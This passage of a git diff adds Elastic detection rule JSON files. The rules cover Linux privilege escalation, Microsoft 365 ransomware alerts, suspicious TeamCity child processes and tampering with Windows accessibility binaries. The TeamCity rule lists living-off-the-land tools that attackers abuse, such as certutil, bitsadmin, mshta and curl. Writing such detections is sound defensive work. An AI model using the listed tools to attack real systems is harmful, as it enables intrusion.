"process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71d6a53d-abbd-40df-afee-c21fff6aafb0", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend and Auditd Manager.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/passwd -p wa -k etcpasswd\"\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "71d6a53d-abbd-40df-afee-c21fff6aafb0_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_103.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_103.json new file mode 100644 index 00000000000..37813249c8f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", + "false_positives": [ + "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Potential ransomware activity", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_105.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_105.json new file mode 100644 index 00000000000..3ea3b21d4d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", + "false_positives": [ + "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Potential ransomware activity", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_206.json b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_206.json new file mode 100644 index 00000000000..eeb7ad95034 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/721999d0-7ab2-44bf-b328-6e63367b9b29_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware.", + "false_positives": [ + "If Cloud App Security identifies, for example, a high rate of file uploads or file deletion activities it may represent an adverse encryption process." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Potential ransomware activity", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1486", + "name": "Data Encrypted for Impact", + "reference": "https://attack.mitre.org/techniques/T1486/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "721999d0-7ab2-44bf-b328-6e63367b9b29_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/730ed57d-ae0f-444f-af50-78708b57edd5_1.json b/packages/security_detection_engine/kibana/security_rule/730ed57d-ae0f-444f-af50-78708b57edd5_1.json new file mode 100644 index 00000000000..ff824581e39 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/730ed57d-ae0f-444f-af50-78708b57edd5_1.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious processes being spawned by the JetBrain TeamCity process. This activity could be related to JetBrains remote code execution vulnerabilities.", + "false_positives": [ + "Powershell and Windows Command Shell are often observed as legit child processes of the Jetbrains TeamCity service and may require further tuning." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious JetBrains TeamCity Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable :\n (\"?:\\\\TeamCity\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\TeamCity\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files (x86)\\\\TeamCity\\\\jre\\\\bin\\\\java.exe\",\n \"?:\\\\TeamCity\\\\BuildAgent\\\\jre\\\\bin\\\\java.exe\") and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"msiexec.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"wmic.exe\", \"curl.exe\", \"ssh.exe\",\n \"rundll32.exe\", \"regsvr32.exe\", \"mshta.exe\", \"certreq.exe\", \"net.exe\", \"nltest.exe\", \"whoami.exe\", \"hostname.exe\",\n \"tasklist.exe\", \"arp.exe\", \"nbtstat.exe\", \"netstat.exe\", \"reg.exe\", \"tasklist.exe\", \"Microsoft.Workflow.Compiler.exe\",\n \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\", \"cdb.exe\", \"cmstp.exe\", \"control.exe\", \"cscript.exe\", \"csi.exe\",\n \"dnx.exe\", \"dsget.exe\", \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"ieexec.exe\", \"iexpress.exe\",\n \"installutil.exe\", \"ipconfig.exe\",\"msxsl.exe\", \"netsh.exe\", \"odbcconf.exe\", \"ping.exe\", \"pwsh.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"regasm.exe\", \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\",\n \"systeminfo.exe\", \"tracert.exe\", \"wmic.exe\", \"wscript.exe\",\"xwizard.exe\", \"explorer.exe\", \"msdt.exe\") and\n not (process.name : \"powershell.exe\" and process.args : \"-ExecutionPolicy\" and process.args : \"?:\\\\TeamCity\\\\buildAgent\\\\work\\\\*.ps1\") and\n not (process.name : \"cmd.exe\" and process.args : \"dir\" and process.args : \"/-c\")\n", + "references": [ + "https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "730ed57d-ae0f-444f-af50-78708b57edd5", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "730ed57d-ae0f-444f-af50-78708b57edd5_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109.json new file mode 100644 index 00000000000..2a9c1467639 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Modification of Accessibility Binaries", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.pe.original_file_name : \"?*\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", + "references": [ + "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.008", + "name": "Accessibility Features", + "reference": "https://attack.mitre.org/techniques/T1546/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110.json new file mode 100644 index 00000000000..e42d5b5fe73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_110.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows contains accessibility features that may be launched with a key combination before a user has logged in. An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Modification of Accessibility Binaries", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.pe.original_file_name : \"?*\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", + "references": [ + "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": 